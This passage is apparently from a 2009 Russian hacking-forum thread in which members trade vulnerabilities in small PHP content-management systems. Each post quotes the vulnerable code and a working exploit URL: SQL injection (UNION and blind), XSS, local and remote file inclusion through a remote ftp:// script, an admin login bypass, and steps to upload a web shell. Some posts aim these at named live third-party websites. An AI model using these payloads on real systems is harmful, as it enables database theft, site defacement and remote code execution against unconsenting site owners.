15.11.2009, 01:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
EasyNEWS SQL injection
easynews.php:
PHP код:
...
if (isset($_GET['id'])) {
$id = $_GET['id'];
$query = 'SELECT * FROM `'.$table_name.'` WHERE newstime='.$id.'';
...
Эксплаьация:
Код:
http://localhost/10/easynews.php?id=1+union+select+1,version(),3,4,5,6--+
|
|
|
15.11.2009, 01:40
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: pHpAS (Article System)
Author: unnamed
Version: 1.12
SQL
file: show.php
PHP код:
...
f(isset($_GET['id'])) {
$sql = "SELECT * FROM arts WHERE id=".$_GET['id'];
$resultaat = mysql_query($sql);
...
target: show.php?id=-1+union+select+1,2,version(),4/*
file: show_comments.php
PHP код:
if(isset($_GET['nr'])) {
$sql = "SELECT * FROM comments WHERE nr=".$_GET['nr'];
$resultaat = mysql_query($sql);
target: show_comments.php?nr=-1+union+select+1,2,3,4,version(),6/*
file: comments_all.php
PHP код:
$sql = "SELECT * FROM comments WHERE id=".$HTTP_GET_VARS['id']."";
/* Тут писатель совсем разленился,даже проверок нет :( */
target: comments_all.php?id=-1+union+select+1,version(),3,4,5,6/*
XSS
file: show.php
PHP код:
...
if (mysql_num_rows($resultaat) >0) {
..
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
...
target: show.php?id="><XSS>
file: show_comments.php
PHP код:
if (mysql_num_rows($resultaat) >0) {
...
}
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
target: show_comments.php?nr="><XSS>
Последний раз редактировалось m0Hze; 15.11.2009 в 15:58..
|
|
|
|
15.11.2009, 21:35
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Название: MigasCMS
Версия: 1.0
Залитие шелла.
Нужны права администратора.
Отсутствует проверка на формат файла.
Раскрытие путей
/cms/index.php?mode=view&recid[]=
/cms/index.php?mode[]=
|
|
|
|
15.11.2009, 22:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Copyright © 2005
Программное обеспечение - BORNET.ru
sql-inj
http://www.evruka.ru/show_cat2.php?grid=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--%20- в админку без пароля:
admin' or true -- -
example:
http://www.evruka.ru/admin/
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 15.11.2009 в 23:08..
|
|
|
|
16.11.2009, 01:13
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
PHPNS version 2.2.4 BLIND SQL INJECTION
Уязвимый скрипт manage.php:
PHP код:
...
while ($item_row = mysql_fetch_array($item_list)) { //for each item in db
//convert timestamp to readable/human date
$item_row['timestamp'] = date($globalvars['time_format'],$item_row['timestamp']);
$item_row['article_cat_name'] = gen_cat_name($item_row['article_cat']); //switch cat_id to readable name
$row_bg = ($row_bg == $globalvars['altcolor'][2]) ? $globalvars['altcolor'][1] : $globalvars['altcolor'][2]; //current row bg
//switch active column to yes, draft, or unapproved.
if ($item_row['active'] == 1) { $item_row['active'] = '<span class="positive">Yes</span>'; } elseif ($item_row['active'] == 0) { $item_row['active'] = '<span class="negative">Draft</span>'; }
if ($item_row['approved'] == 0) { $item_row['active'] = '<span class="negative">Unapproved</span>'; }
$item_row['comments'] = mysql_num_rows(general_query('SELECT * FROM '.$databaseinfo['prefix'].'comments WHERE article_id="'.$item_row['id'].'"'));
if (strlen($item_row['article_title']) > 30) {
$item_row['article_title'] = wordwrap($item_row['article_title'], 30, "<br />");
}
//generate the actual html rows
$table_rows = $table_rows.'<tr bgcolor="'.$row_bg.'">
<td>
<a href="article.php?id='.$item_row['id'].'&do=edit"><img src="images/icons/edit.png" class="row_icon" alt="edit icon" title="edit "'.$item_row['article_title'].'"" /></a>
<a href="article.php?id='.$item_row['id'].'&do=edit" title="edit "'.$item_row['article_title'].'""><strong>'.$item_row['article_title'].'</strong></a>
</td>
<td><a href="manage.php?v='.$item_row['article_cat'].'">'.$item_row['article_cat_name'].'</a></td>
<td>'.$item_row['timestamp'].'</td>
<td><a href="manage.php?v='.$item_row['article_author'].'">'.$item_row['article_author'].'</a></td>
<td align="center"><a href="article.php?do=comments&id='.$item_row['id'].'">'.$item_row['comments'].'</a></td>
<td align="center">'.$item_row['active'].'</td>
<td class="checkbox"><input type="checkbox" value="'.$item_row['id'].'" name="'.$item_row['id'].'"></td></tr>';
} //end of each item in db generation
...
Реализация:
Код:
http://localhost/15/manage.php?v=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Таблица с юзерами: phpns_users
Для успешной реализации - magic_quotes_gpc = off
|
|
|
|
16.11.2009, 17:48
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от AFoST
Copyright © 2005
Программное обеспечение - BORNET.ru
sql-inj
http://www.evruka.ru/show_cat2.php?grid=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--%20- в админку без пароля:
admin' or true -- -
example:
http://www.evruka.ru/admin/
Я, конечно, дико извиняюсь, но выложил до этого http://forum.antichat.net/showthread.php?p=1194275#post1194275
НУ и еще......
WebGrand CMS 2.0 © 2003
Код:
http://www.la-primavera.org/admin/
Эксплуатация.
Недостаточная фильтрация.
(c)
Последний раз редактировалось Shaitan-Devil; 16.11.2009 в 17:56..
|
|
|
|
16.11.2009, 21:08
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
[ Cerulean Portal System version 0.7 LFI ]
Уязвимый код portal.php:
PHP код:
...
include ($phpbb_root_path . 'portal/config.' . $phpEx);
...
Реализация:
Код:
http://localhost/18/portal.php?phpEx=./../../file.php
Требования: register_globals = ON
Так же там есть RFI, но его я не выкладываю, так как его нашли ранше меня и уже опубликовали 
Последний раз редактировалось Ins3t; 16.11.2009 в 21:11..
|
|
|
|
16.11.2009, 21:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Inspirado (blog engine)
Released 02/02/2009
http://inspirado.sourceforge.net/
LFI
themes/k2/block.php
themes/vistacolors/block.php
PHP код:
<?php include "./blocks/".$blog_blockfile ?>
http://localhost/inspirado_1/themes/k2/block.php?blog_blockfile=../../../../../../../../etc/passwd
SQL
admin/index.php
PHP код:
include "./structure/theme.php";
admin/structure/theme.php
PHP код:
<?php include "./modules.php"; ?>
admin/modules.php
PHP код:
case "editlink":
include "./structure/editlink.php";
admin/structure/editlink.php
PHP код:
$linkInfo=getLinkInfo($_GET)
admin/lib/functions.php
PHP код:
function getLinkInfo ($id) {
$link = dbQuery("SELECT * FROM ".DBPREFIX."headlinks WHERE id=".$id);
$link = mysql_fetch_array($link,MYSQL_ASSOC);
return $link;
http://localhost/inspirado_1/admin/index.php?m=editlink&id=-1+union+select+1,2,version(),user(),5
шелл льется из админки
Administration Panel => Widgets => Create PHP block
искать в
http://localhost/inspirado_1/blocks/shell.php
|
|
|
|
16.11.2009, 22:37
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Lanius CMS version 0.5.2 RFI
Требования: register_globals= ON
allow_url_include = ON
Уязвимый код index.php:
PHP код:
...
require 'core.php';
include $d_root.'includes/header.php';
...
Смотрим в core.php:
PHP код:
...
if (!file_exists( $d_root.$d_private.'config.php' )) {
header( "Location: install/index.php" );
exit();
}
...
Эксплатация:
Код:
http://localhost/11/index.php?d_root=ftp://login:pass@host/script.php%00
Последний раз редактировалось Ins3t; 16.11.2009 в 22:59..
|
|
|
|
17.11.2009, 10:14
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
ADN-FORUM version 0.1b Blind Sql INJECTION
crear.php:
PHP код:
...
$result = mysql_query("SELECT anonimos FROM ".$prefijo."_foros where id='$fid'",$conexion);
$row = mysql_fetch_row($result);
if(!isset($fpusuario) && $row[0]==0){echo"<br><br><center>"._CREARMSG2."<br><br><br><br><a href=\"index.php?fid=$fid\"><img src=\"img/$lenguaje/aceptar.gif\" border=0 align=absmiddle></a></center>";}
...
Реализация:
Код:
http://localhost/19/crear.php?fid=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
mq=off
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
